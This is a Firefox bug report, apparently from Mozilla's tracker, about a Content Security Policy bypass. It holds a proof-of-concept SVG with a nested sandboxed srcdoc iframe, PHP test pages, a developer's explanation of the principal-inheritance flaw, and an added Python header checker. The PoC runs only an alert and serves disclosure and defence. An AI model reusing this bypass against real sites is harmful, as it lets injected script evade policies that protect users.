Closed
Bug 1295489
Opened 9 years ago
Closed 9 years ago
Mozilla Firefox V51.0 CSP Bypass
Categories
(Core :: DOM: Security, defect)
RESOLVED
DUPLICATE
of bug 1073952
People
(Reporter: 1009465756, Unassigned)
Details
(Keywords: reporter-external)
Attachments
(1 file)
1.42 KB, image/svg+xml
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Steps to reproduce:
User Agent:
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0
Open the PoC; you will see the alert window in the browser:
http://115.159.58.203/uxss/s.svg
========
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
xmlns="http://www.w3.org/2000/svg"
xmlns:xhtml="http://www.w3.org/1999/xhtml"
width="100"
height="100"
viewBox="-34 -34 68 68"
version="1.1">
<circle
cx="0"
cy="0"
r="50"
fill="#c8c8c8"/>
<foreignObject x="0" y="0" width="34" height="34">
<!-- XHTML fragment rendered inside the SVG via foreignObject -->
<xhtml:html>
<xhtml:head>
<xhtml:style>
html,body,img { padding: 0px; margin: 0px; border: 0px; }
</xhtml:style>
</xhtml:head>
<xhtml:body>
<!-- The srcdoc value is entity-escaped so the file stays well-formed XML;
     it embeds a second sandboxed iframe pointing at the CSP-protected page -->
<xhtml:iframe width="10" height="10" srcdoc="&lt;iframe style=&quot;width:1000px;height:1000px&quot; sandbox=&quot;allow-modals allow-popups allow-scripts&quot; src=&quot;http://115.159.58.203/uxss/csp2.php&quot;&gt;" sandbox="allow-modals allow-popups allow-scripts">circle</xhtml:iframe>
</xhtml:body>
</xhtml:html>
</foreignObject>
</svg>
Page with CSP set:
http://115.159.58.203/uxss/csp2.php
Actual results:
I set the CSP header in csp2.php
http://115.159.58.203/uxss/csp2.php
=======
<?php
// Same policy sent under the current header name and the two legacy names
header("X-Content-Security-Policy: default-src 'self'");
header("Content-Security-Policy: default-src 'self'");
header("X-Webkit-CSP: default-src 'self'");
// Inline script (in srcdoc and in the onload handler) that default-src 'self' should block
echo '<!doctype html>
<iframe srcdoc="<script>alert(/CSP/)</script>" onload=alert(1)>';
?>
So, when you visit "http://115.159.58.203/uxss/csp2.php" directly, the CSP prevents the '<iframe srcdoc="<script>alert(/CSP/)</script>" onload=alert(1)>' from executing.
But when you visit 'http://115.159.58.203/uxss/s.svg', you will find that the value of "srcdoc" has been executed: you will get an alert.
Expected results:
In other browsers, when you visit 'http://115.159.58.203/uxss/s.svg', the alert window will never be shown. Something might be wrong in the Firefox PC version?
Comment 1•9 years ago
Btw, even if "default-src" is set, the PoC s.svg still works:
csp2.php:
<?php
// Same as before, but with the strictest possible default source list
header("X-Content-Security-Policy: default-src 'none'");
header("Content-Security-Policy: default-src 'none'");
header("X-Webkit-CSP: default-src 'none'");
// Inline script that default-src 'none' should block
echo '<!doctype html>
<iframe srcdoc="<script>alert(/CSP/)</script>" onload=alert(1)>';
?>
OS: Unspecified → Windows 7
Hardware: Unspecified → x86_64
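The two csp2.php responses quoted above (in the description and in Comment 1) can be reviewed for what their policies actually promise. The following Python script is an added example, not code from the bug report, that parses the quoted headers (constructed inline from the PHP source, with no network access) and reports whether inline script would be blocked when the policy is enforced, whether any other origin may frame the page, and whether the response relies on the legacy X-Content-Security-Policy / X-Webkit-CSP header names, which browsers of this era already ignored. The `CSP2_HARDENED` variant with `frame-ancestors 'none'` is an assumption of mine, not something the report proposes: the PoC depends on embedding csp2.php from another origin, and that directive denies such embedding independently of how the nested sandboxed document's CSP inheritance behaves.

```python
"""CSP header review for the csp2.php responses quoted in this bug.

Added example, not part of the original report. It models the policies
csp2.php sends ("default-src 'self'" and "default-src 'none'") as
constructed header dictionaries and reports, for each:

  * whether inline script and inline event handlers would be blocked
    when the policy is actually enforced on the document,
  * whether the page can be framed by other origins (the PoC embeds
    csp2.php from a different origin, so frame-ancestors matters),
  * whether the response still carries the legacy X-Content-Security-Policy
    / X-Webkit-CSP headers, which modern browsers ignore.
"""

from typing import Dict, List, Optional

# Headers as sent by the csp2.php snippets quoted in the report (constructed
# here from the PHP source; this example never talks to the network).
CSP2_SELF = {
    "X-Content-Security-Policy": "default-src 'self'",
    "Content-Security-Policy": "default-src 'self'",
    "X-Webkit-CSP": "default-src 'self'",
}
CSP2_NONE = {
    "X-Content-Security-Policy": "default-src 'none'",
    "Content-Security-Policy": "default-src 'none'",
    "X-Webkit-CSP": "default-src 'none'",
}
# Hypothetical hardened variant (assumption, not from the report): same script
# policy, but the document also refuses to be framed, which removes the
# cross-origin embedding the PoC needs.
CSP2_HARDENED = {
    "Content-Security-Policy": "default-src 'none'; frame-ancestors 'none'",
}

LEGACY_HEADERS = ("X-Content-Security-Policy", "X-Webkit-CSP")


def parse_csp(policy: str) -> Dict[str, List[str]]:
    """Split a CSP string into {directive-name: [source expressions]}."""
    directives: Dict[str, List[str]] = {}
    for chunk in policy.split(";"):
        tokens = chunk.strip().split()
        if not tokens:
            continue
        name, sources = tokens[0].lower(), tokens[1:]
        directives.setdefault(name, sources)  # first occurrence wins, per spec
    return directives


def effective_sources(directives: Dict[str, List[str]], name: str) -> Optional[List[str]]:
    """Fetch directives fall back to default-src when absent; frame-ancestors does not."""
    if name in directives:
        return directives[name]
    if name != "frame-ancestors":
        return directives.get("default-src")
    return None


def analyze_csp(headers: Dict[str, str]) -> Dict[str, object]:
    """Summarise what the Content-Security-Policy header of a response enforces."""
    directives = parse_csp(headers.get("Content-Security-Policy", ""))
    script = effective_sources(directives, "script-src")
    framing = effective_sources(directives, "frame-ancestors")
    return {
        "has_csp": bool(directives),
        # Inline <script> and onload= handlers are blocked unless the effective
        # script source list allows 'unsafe-inline' (nonces/hashes are not
        # modelled here) or there is no policy at all.
        "inline_script_blocked": script is not None and "'unsafe-inline'" not in script,
        # Without a frame-ancestors directive any origin may embed the page.
        "framing_restricted": framing is not None,
        "legacy_headers": [h for h in LEGACY_HEADERS if h in headers],
    }


def report(label: str, headers: Dict[str, str]) -> str:
    """Render the analysis as a few human-readable lines."""
    r = analyze_csp(headers)
    lines = [f"{label}:",
             f"  inline script blocked by policy: {r['inline_script_blocked']}",
             f"  embedding by other origins restricted: {r['framing_restricted']}"]
    if r["legacy_headers"]:
        lines.append("  legacy CSP headers present (ignored by modern browsers): "
                     + ", ".join(r["legacy_headers"]))
    return "\n".join(lines)


if __name__ == "__main__":
    for label, hdrs in (("csp2.php (default-src 'self')", CSP2_SELF),
                        ("csp2.php (default-src 'none')", CSP2_NONE),
                        ("hardened variant (assumed)", CSP2_HARDENED)):
        print(report(label, hdrs))
```

"Inline script blocked" here describes the policy as written. The bug itself is that Firefox 51 did not apply that policy to the document inside the sandboxed srcdoc iframe, so the check tells you what a conforming browser enforces, not what a buggy one did; the framing check is the one that holds regardless of that inheritance behaviour.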
Comment 2•9 years ago
Bob, seems like somehow the sandboxed iframe's "allow-scripts" flag is overriding the server-sent CSP for the parent page?
Group: firefox-core-security → core-security
Component: Untriaged → DOM: Security
Flags: needinfo?(bobowen.code)
Product: Firefox → Core
Updated•9 years ago
Flags: sec-bounty?
Comment 3•9 years ago
This is a known issue with srcdoc and sandbox. The sandbox gives a unique principal to the srcdoc content, which (currently) means it doesn't inherit the CSP from the no-longer-same-origin parent. We need to create a new way to pass along a CSP to a sandbox because inheriting it from the nsPrincipal won't work in this case.
Group: core-security → dom-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Flags: needinfo?(bobowen.code)
Resolution: --- → DUPLICATE
Updated•9 years ago
Flags: sec-bounty? → sec-bounty-
Updated•8 years ago
Group: dom-core-security
Updated•9 months ago
Keywords: reporter-external